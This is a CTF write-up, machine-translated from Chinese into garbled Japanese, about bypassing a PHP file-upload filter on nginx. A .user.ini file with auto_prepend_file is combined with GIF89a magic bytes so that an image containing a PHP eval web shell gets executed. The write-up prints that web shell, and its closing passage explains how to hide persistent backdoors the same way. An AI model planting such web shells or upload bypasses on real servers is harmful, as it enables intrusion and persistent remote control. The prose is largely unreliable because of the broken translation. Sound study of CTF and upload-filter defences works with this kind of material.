ファイルには、より多くの古典的な質問をアップロード.user.ini制御モード分析絵を調査します
アップロード機能、ソースコードや兆候、特定のトピックを開き、あなたが、フィルタをテストする必要があると思われます
前とターン提出phpの後、PHP5は、PHP7は、フィルタリングされたファイルPHTMLの名前を展開し、PHPコードを含めることはできません。<?キャラクターソング
最初は、HTMLを使用して、この時間を考えたPHPコードを挿入するために、<スクリプト言語=「PHP」>タグを
それが名を展開するために定期的にPHPを傍受しかし、最初に考えたのJPGは、PHP構文解析と.htaccessファイルにJPGファイルを使用し、PHPコードを含むファイルをアップロード
ディスカバリーサーバーミドルウェアは、nginxのではなく、apacheのであるため、.htaccessのこの環境には適用されない、Baiduはファイル.user.iniプレイすることを学ぶために使用することができ、同じ効果の.htaccessを
:このメソッドは、参照することができhttps://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A% 84PHP%E5%90%8E% E9%97%A8.html
グッド書き込み.user.iniファイルアップロードプロンプト「exif_imagetype :!ない画像」
次のように定期的なルーチンは、もう一度試して前GIF89aのファイルを追加し、正常にアップロード、.user.iniコードは次のとおりです。
GIF89aの
auto_prepend_file = ye.jpg
次のようにした後、同じタイプの検出器GIF89aのバイパスを使用して、PHPコードye.jpgを含む写真をアップロード、ye.jpgコードがあります:
GIF89aの <スクリプト言語= ' PHP ' > @Eval($ _ POST [ ' がた' ]); </ SCRIPT>
タイトルからは、アップロードされたファイルがさえフラグを取得するために包丁で、index.phpファイルのアップロードディレクトリに含まれます知ることができます。
明示単語旗を取得、または一般的にシステムを使用しようとするトロイの木馬の使用を必要としない限り、ここにヒントは、()関数はフラグを読み、文を直接旗が見つかっトロイの木馬に接続されていない前に、時間の質問を行い、毎日CTFゲームで、ですそして最後にまたhhhhhhh、それ攪拌糞であることを恐れて話題かもしれ旗にシステムを()を読み出します。また、回避すべき環境でのトピックのいくつかはするphpinfoを表示されません、のphpinfo()関数なので、PHPコードは最高のビューの文字列をエコーに実行されるかどうかをテスト。
他のマスターから直接抜粋でファイルアップロードの質問でアプリケーション.user.iniを総括するには:
可能性の実際の使用.user.ini
上述したように
.user.ini
、以下の条件を使用して:
- サーバーのスクリプト言語PHP
- サーバはCGI / FastCGIのモードを使用しています
- PHPファイルのアップロードディレクトリには、実行ファイルの下を持っています
この観点から、
.user.ini
より.htaccess
幅広いへの応用の範囲は、すべての後に、.htaccess
それは、Apacheでのみ使用することができますしかし、精査近い我々は感じるだろう「PHP実行ファイルを持ってアップロードディレクトリの下に」 PHPファイルのアップロードに自分のホームディレクトリやファイル内のファイルをアップロードするファイルのアップロードでは、この要件はまた、より多くの要求している、何の天才開発者があってはなりませんフォルダ。
しかし、私はパスをアップロードするためにCMSに会ったいくつかの時間前に、それは、私たちが実際の状況と他の脆弱性を使用する場合は奇跡的なことがあり、何の方法ではないではありませんが検出されなかった
../
ファイルは、この場合には、任意のディレクトリにアップロードすることができたので、我々は、おそらく使用することができます.user.ini
また、
.user.ini
バックドアに隠されたの使用は方法の良い使用する必要があり、私たちのディレクトリのPHPファイルの存在に残さ.user.ini
バックドアを隠す目的を達成するためにそうすることを、そして私たちの馬の絵。
以下からの引用:https://xz.aliyun.com/t/6091